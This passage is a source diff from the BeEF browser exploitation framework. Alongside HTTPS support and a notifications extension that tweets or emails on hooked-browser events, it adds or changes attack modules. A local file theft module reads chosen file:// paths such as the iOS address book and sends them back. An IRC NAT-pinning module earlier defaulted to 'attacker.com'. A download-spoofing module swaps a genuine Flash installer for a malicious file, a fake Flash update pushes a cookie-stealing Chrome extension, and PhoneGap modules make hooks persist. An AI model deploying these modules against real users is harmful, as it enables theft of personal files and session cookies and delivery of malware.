# rescue Exception => e
# print_error "WebSocket error: #{e}"
# end
# end
# }
#}
end
def start_websocket_server(ws_options, secure)
Thread.new {
sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
EventMachine.run {
EventMachine::WebSocket.start(ws_options) do |ws|
begin
print_debug "New WebSocket channel open."
secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
ws.onmessage { |msg|
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
@@ -80,7 +219,6 @@ module BeEF
end
}
}
end
#@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +253,7 @@ module BeEF
handler = data["handler"]
if handler.match(/command/)
BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
else #processing results from extensions, call the right handler
data["beefhook"] = hooked_browser
data["results"] = JSON.parse(Base64.decode64(data["result"]))

10
core/main/server.rb
View File

@@ -48,7 +48,8 @@ module BeEF
'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'),
'beef_hook' => @configuration.get('beef.http.hook_file')
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
}
end
@@ -108,6 +109,13 @@ module BeEF
@configuration.get('beef.http.host'),
@configuration.get('beef.http.port'),
@rack_app)
if @configuration.get('beef.http.https.enable') == true
@http_server.ssl = true
@http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
:cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),
:verify_peer => false}
end
end
end

2
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -308,7 +308,7 @@ class Core
if driver.interface.targetid.length > 1
driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
else
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
end
end

3
extensions/evasion/config.yaml
View File

@@ -19,10 +19,11 @@ beef:
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
scramble_variables: true
scramble_cookies: true
scramble:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify", "base_64"]
chain: ["scramble", "minify"]

60
extensions/notifications/channels/email.rb Normal file
View File

@@ -0,0 +1,60 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
require 'net/smtp'
module BeEF
module Extension
module Notifications
module Channels
class Email
#
# Constructor
#
def initialize(to_address, message)
@config = BeEF::Core::Configuration.instance
@from_address = @config.get('beef.extension.notifications.email.from_address')
@smtp_host = @config.get('beef.extension.notifications.email.smtp_host')
@smtp_port = @config.get('beef.extension.notifications.email.smtp_port')
@smtp_tls_enable = @config.get('beef.extension.notifications.email.smtp_tls_enable')
@password = @config.get('beef.extension.notifications.email.smtp_tls_password')
# configure the email client
msg = "Subject: BeEF Notification\n\n" + message
smtp = Net::SMTP.new @smtp_host, @smtp_port
#if @smtp_tls_enable?
# smtp.enable_starttls
# smtp.start('beefproject.com', @from_address, @password, :login) do
# smtp.send_message(msg, @from_address, @to_address)
# end
#else
smtp.start do
smtp.send_message(msg, @from_address, to_address)
end
#end
end
end
end
end
end
end

53
extensions/notifications/channels/tweet.rb Normal file
View File

@@ -0,0 +1,53 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
#
require 'twitter'
module BeEF
module Extension
module Notifications
module Channels
class Tweet
#
# Constructor
#
def initialize(username, message)
@config = BeEF::Core::Configuration.instance
# configure the Twitter client
Twitter.configure do |config|
config.consumer_key = @config.get('beef.extension.notifications.twitter.consumer_key')
config.consumer_secret = @config.get('beef.extension.notifications.twitter.consumer_secret')
config.oauth_token = @config.get('beef.extension.notifications.twitter.oauth_token')
config.oauth_token_secret = @config.get('beef.extension.notifications.twitter.oauth_token_secret')
end
begin
Twitter.direct_message_create(username, message)
rescue
print "Twitter send failed, verify tokens have Read/Write/DM acceess..\n"
end
end
end
end
end
end
end

33
extensions/notifications/config.yaml Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
notifications:
enable: false
name: Notifications
twitter:
enable: false
consumer_key: app_consumer_key
consumer_secret: app_consumer_secret
oauth_token: your_oauth_token_for_this_app
oauth_token_secret: your_oauth_token_secret_for_this_app
target_username:
email:
enable: false
from_address: sender_email_address
to_address: receipient_email_address
smtp_host: 127.0.0.1
smtp_port: 25

30
extensions/notifications/extension.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Notifications
extend BeEF::API::Extension
@short_name = 'notifications'
@full_name = 'Notifications'
@description = 'Generates external notifications for events in BeEF'
end
end
end
require 'extensions/notifications/notifications'

57
extensions/notifications/notifications.rb Normal file
View File

@@ -0,0 +1,57 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'extensions/notifications/channels/tweet'
require 'extensions/notifications/channels/email'
module BeEF
module Extension
module Notifications
#
# Notifications class
#
class Notifications
def initialize(from, event, time_now, hb)
@config = BeEF::Core::Configuration.instance
if @config.get('beef.extension.notifications.enable') == false
# notifications are not enabled
return nil
else
@from = from
@event = event
@time_now = time_now
@hb = hb
end
message = "#{from} #{event} #{time_now} #{hb}"
if @config.get('beef.extension.notifications.twitter.enable') == true
username = @config.get('beef.extension.notifications.twitter.target_username')
BeEF::Extension::Notifications::Channels::Tweet.new(username,message)
end
if @config.get('beef.extension.notifications.email.enable') == true
to_address = @config.get('beef.extension.notifications.email.to_address')
BeEF::Extension::Notifications::Channels::Email.new(to_address,message)
end
end
end
end
end
end

62
modules/misc/local_file_theft/command.js
View File

@@ -86,6 +86,16 @@ result = '';
}
}
fileList['custom']= {
// user defined
"discover" :'',
"post" :{
'result':'<%== @target_file %>',
}
}
functionList = {
mac:{
// OS X disovery
@@ -138,11 +148,25 @@ result = '';
grabFiles(homedir,"ios")
}
}
alert("ipad")
return true;
}
},
custom:{
// Grab custom stuff
discover : function(){
tmp = new XMLHttpRequest()
tmp.open('get',fileList['custom']['discover'])
tmp.send()
tmp.onreadystatechange=function(){
if(tmp.readyState==4){
homedir = "file:///";
grabFiles(homedir,"custom")
}
}
return true;
}
},
android:{
// figure out what app (gmail, browser, or dolphin?) android
discover : function(){
@@ -172,19 +196,27 @@ result = '';
function identify(){
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
// custom file is specified
if ('<%== @target_file %>' != 'autodetect') {
return "custom"
// determine a good file to steal based on platform
} else {
if(/.*Android.*/.test(navigator.userAgent)){
return "android"
} else if(/Linux.*/i.test(navigator.platform)){
return "linux"
} else if(/iP.*/i.test(navigator.platform)){
return "ios"
} else if(/.*Mac.*/i.test(navigator.userAgent)){
return "mac"
} else if(/.*Windows.*/i.test(navigator.userAgent)){
return "windows"
} else if(/.*hpwOS.*/i.test(navigator.platform)){
return "webos"
}
}
}

10
modules/misc/local_file_theft/module.rb
View File

@@ -19,6 +19,16 @@
class Local_file_theft < BeEF::Core::Command
def self.options
return [
{'name' => 'target_file',
'description' => 'The full path to the local file to steal e.g. file:///var/mobile/Library/AddressBook/AddressBook.sqlitedb',
'ui_label' => 'Target file',
'value' => 'autodetect'
}
]
end
def post_execute
content = {}
content['result'] = @datastore['result']

2
modules/network/nat_pinning_irc/command.js
View File

@@ -25,7 +25,7 @@ beef.execute(function() {
var myIframe = beef.dom.createInvisibleIframe();
var myForm = document.createElement("form");
var action = connectto + ":6667/"
var action = "http://" + connectto + ":6667/"
myForm.setAttribute("name", "data");
myForm.setAttribute("method", "post");

5
modules/network/nat_pinning_irc/module.rb
View File

@@ -20,8 +20,11 @@ class Irc_nat_pinning < BeEF::Core::Command
end
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name'=>'connectto', 'ui_label' =>'Connect to','value'=>'http://attacker.com'},
{'name'=>'connectto', 'ui_label' =>'Connect to','value'=>beef_host},
{'name'=>'privateip', 'ui_label' =>'Private IP','value'=>'192.168.0.100'},
{'name'=>'privateport', 'ui_label' =>'Private Port','value'=>'22'}
]

37
modules/phonegap/phonegap_check_connection/command.js Normal file
View File

@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
beef.execute(function() {
var connection_type;
getConnectionType = function() {
var states = {};
states[Connection.UNKNOWN] = 'Unknown connection';
states[Connection.ETHERNET] = 'Ethernet connection';
states[Connection.WIFI] = 'WiFi connection';
states[Connection.CELL_2G] = 'Cell 2G connection';
states[Connection.CELL_3G] = 'Cell 3G connection';
states[Connection.CELL_4G] = 'Cell 4G connection';
states[Connection.NONE] = 'No network connection';
return states[navigator.network.connection.type];
}
try {
connection_type = getConnectionType();
} catch(e) {
connection_type = "Unable to determine connection type."
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "connection_type="+connection_type);
});

27
modules/phonegap/phonegap_check_connection/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
beef:
module:
phonegap_check_connection:
enable: true
category: "Phonegap"
name: "Check connection"
description: "Find out connection type e.g. Wifi, 3G.."
authors: ["mh"]
target:
working: ["All"]

27
modules/phonegap/phonegap_check_connection/module.rb Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# phonegap
#
class Phonegap_check_connection < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

1
modules/phonegap/phonegap_detect/command.js
View File

@@ -23,6 +23,7 @@ beef.execute(function() {
phonegap_details = ""
+ " name: " + device.name
+ " phonegap api: " + device.phonegap
+ " cordova api: " + device.cordova
+ " platform: " + device.platform
+ " uuid: " + device.uuid
+ " version: " + device.version;

31
modules/phonegap/phonegap_persist_resume/command.js Normal file
View File

@@ -0,0 +1,31 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// persist on over app's sleep/wake events
beef.execute(function() {
var result;
try {
document.addEventListener("resume", beef_init(), false);
result = 'success';
} catch (e) {
for(var n in e) {
result+= n + " " + e[n] + "\n";
}
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
});

27
modules/phonegap/phonegap_persist_resume/config.yaml Normal file
View File

@@ -0,0 +1,27 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
beef:
module:
phonegap_persist_resume:
enable: true
category: "Phonegap"
name: "Persist resume"
description: "Persist over applications sleep/wake events"
authors: ["mh"]
target:
working: ["All"]

26
modules/phonegap/phonegap_persist_resume/module.rb Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# persist on over app's sleep/wake events
class Phonegap_persist_resume < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

2
modules/social_engineering/fake_flash_update/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source"
description: "Prompts the user to install an update to Adobe Flash Player.<br />The default install file is a Chrome extension. <br /><br /> A chrome extenstion has privileged access and can do a whole lot.. <ul><li>- Access all tabs and inject beef into all tabs</li><li>- Use hooked browser as a proxy to do cross domain requests</li><li>- Get all cookies including HTTPonly cookies</li></ul><br />See chrome extensions beef modules for more examples<br />See extensions/demos/flash_update_chrome_extension for extension source. <b>Note</b>: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded."
authors: ["mh"]
target:
user_notify: ['ALL']

37
modules/social_engineering/lcamtuf_download/command.js Normal file
View File

@@ -0,0 +1,37 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var maliciousurl = '<%= @malicious_file_uri %>';
var realurl = '<%= @real_file_uri %>';
var w;
var once = '<%= @do_once %>';
function doit() {
if (!beef.browser.isIE()) {
w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=' + realurl + '">', 'foo');
setTimeout(donext, 4500);
}
}
function donext() {
window.open(maliciousurl, 'foo');
if (once != true) setTimeout(donext, 5000);
once = true;
}
doit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
});

26
modules/social_engineering/lcamtuf_download/config.yaml Normal file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
lcamtuf_download:
enable: true
category: "Social Engineering"
name: "Lcamtuf Download"
description: "This module will attempt to execute a lcamtuf download. The file will be served with an alternative <i>Content-Disposition: attachment</i> header. For more information please refer to <a href='http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html'>http://lcamtuf.blogspot.co.uk/2012/05/yes-you-can-have-fun-with-downloads.html</a> ."
authors: ["Bart Leppens"]
target:
user_notify: ["ALL"]
not_working: ["IE"]

48
modules/social_engineering/lcamtuf_download/module.rb Normal file
View File

@@ -0,0 +1,48 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Lcamtuf_download < BeEF::Core::Command
# set and return all options for this module
def self.options
return [{
'name' => 'real_file_uri',
'description' => 'The web accessible URI for the real file.',
'ui_label' => 'Real File Path',
'value' => 'http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869',
'width' => '300px'
},
{
'name' => 'malicious_file_uri',
'description' => 'The web accessible URI for the malicious file.',
'ui_label' => 'Malicious File Path',
'value' => '',
'width' => '300px'
},
{ 'name' => 'do_once', 'type' => 'combobox', 'ui_label' => 'Run Once', 'store_type' => 'arraystore',
'store_fields' => ['do_once'], 'store_data' => [['false'],['true']],
'valueField' => 'do_once', 'displayField' => 'do_once', 'mode' => 'local', 'value' => 'false', 'autoWidth' => true
}]
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end